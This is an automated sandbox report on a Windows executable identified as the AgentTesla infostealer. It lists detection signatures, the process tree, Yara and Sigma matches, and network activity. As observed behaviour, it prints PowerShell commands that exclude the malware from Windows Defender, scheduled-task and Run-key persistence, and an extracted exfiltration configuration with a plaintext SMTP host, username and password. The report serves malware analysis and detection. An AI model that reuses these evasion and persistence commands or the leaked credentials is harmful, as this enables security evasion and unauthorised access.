Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oBMlky3Rkm7h5QK.exe

Overview

General Information

Sample name:oBMlky3Rkm7h5QK.exe
Analysis ID:1417528
MD5:596365c750c4f8e60a966e220e35e7d9
SHA1:234b7114f19589e1768670361e2a4cd7328f8c75
SHA256:e77c8ca31128a1a181b99a8234f39559854855d871d7abe167e004bb970e7f3c
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • oBMlky3Rkm7h5QK.exe (PID: 3544 cmdline: "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe" MD5: 596365C750C4F8E60A966E220E35E7D9)
    • powershell.exe (PID: 1132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2360 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 1292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7060 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • ECXXCuFHUVw.exe (PID: 2136 cmdline: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe MD5: 596365C750C4F8E60A966E220E35E7D9)
    • schtasks.exe (PID: 4032 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3636 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • qZeUnR.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • qZeUnR.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.pacificindia.com", "Username": "hr@pacificindia.com", "Password": "FEYEjBLgGnyw"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000E.00000002.3307025913.0000000003348000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.2133378984.000000000259C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x339c2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33a34:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33abe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33b50:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33bba:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33c2c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x33cc2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33d52:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 24 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ParentImage: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe, ParentProcessId: 3544, ParentProcessName: oBMlky3Rkm7h5QK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ProcessId: 1132, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 1936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\qZeUnR
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ParentImage: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe, ParentProcessId: 3544, ParentProcessName: oBMlky3Rkm7h5QK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ProcessId: 1132, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe, ParentImage: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe, ParentProcessId: 2136, ParentProcessName: ECXXCuFHUVw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp", ProcessId: 4032, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.226.124.127, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1936, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49705
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ParentImage: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe, ParentProcessId: 3544, ParentProcessName: oBMlky3Rkm7h5QK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp", ProcessId: 7060, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ParentImage: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe, ParentProcessId: 3544, ParentProcessName: oBMlky3Rkm7h5QK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ProcessId: 1132, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe", ParentImage: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe, ParentProcessId: 3544, ParentProcessName: oBMlky3Rkm7h5QK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp", ProcessId: 7060, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.pacificindia.com", "Username": "hr@pacificindia.com", "Password": "FEYEjBLgGnyw"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeVirustotal: Detection: 69%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: oBMlky3Rkm7h5QK.exeReversingLabs: Detection: 68%
                    Source: oBMlky3Rkm7h5QK.exeVirustotal: Detection: 59%Perma Link
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: oBMlky3Rkm7h5QK.exeJoe Sandbox ML: detected
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49706 version: TLS 1.2
                    Source: oBMlky3Rkm7h5QK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: HGCt.pdb source: oBMlky3Rkm7h5QK.exe, ECXXCuFHUVw.exe.0.dr
                    Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000009.00000002.2138116627.0000000005880000.00000004.00000020.00020000.00000000.sdmp, qZeUnR.exe, 0000000F.00000000.2223100492.0000000000692000.00000002.00000001.01000000.0000000D.sdmp, qZeUnR.exe.9.dr
                    Source: Binary string: RegSvcs.pdbKL source: RegSvcs.exe, 0000000E.00000002.3313067108.00000000064D0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.2138116627.0000000005880000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3313067108.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, qZeUnR.exe, 0000000F.00000000.2223100492.0000000000692000.00000002.00000001.01000000.0000000D.sdmp, qZeUnR.exe.9.dr
                    Source: Binary string: HGCt.pdbSHA256 source: oBMlky3Rkm7h5QK.exe, ECXXCuFHUVw.exe.0.dr
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 4x nop then jmp 0706CEBCh0_2_0706D221
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeCode function: 4x nop then jmp 077FC1A4h10_2_077FC509

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49705 -> 23.226.124.127:587
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.6:49705 -> 23.226.124.127:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.ipify.org
                    Source: RegSvcs.exe, 00000009.00000002.2133378984.000000000259C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.0000000003348000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.pacificindia.com
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104108311.0000000002E2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ECXXCuFHUVw.exe, 0000000A.00000002.2152988500.000000000340E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECXXCuFHUVw.exe, 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECXXCuFHUVw.exe, 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49706 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, NDL2m67zO.cs.Net Code: P8S36WO8sc
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, NDL2m67zO.cs.Net Code: P8S36WO8sc

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ECXXCuFHUVw.exe.46edac8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ECXXCuFHUVw.exe.46edac8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_010ADC740_2_010ADC74
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_02DB70300_2_02DB7030
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_02DB00400_2_02DB0040
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_02DB00070_2_02DB0007
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_02DB702B0_2_02DB702B
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_070600400_2_07060040
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_070606110_2_07060611
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_070606200_2_07060620
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_070685D00_2_070685D0
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_070673300_2_07067330
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_0706A2480_2_0706A248
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_0706F2870_2_0706F287
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_070600310_2_07060031
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_07065FA00_2_07065FA0
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_07068EA80_2_07068EA8
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_07066EF80_2_07066EF8
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeCode function: 0_2_07066AC00_2_07066AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0249E6649_2_0249E664
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02494AA89_2_02494AA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02493E909_2_02493E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0249ACF89_2_0249ACF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_024941D89_2_024941D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD35209_2_05DD3520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD66B09_2_05DD66B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_05DD56589_2_05DD5658
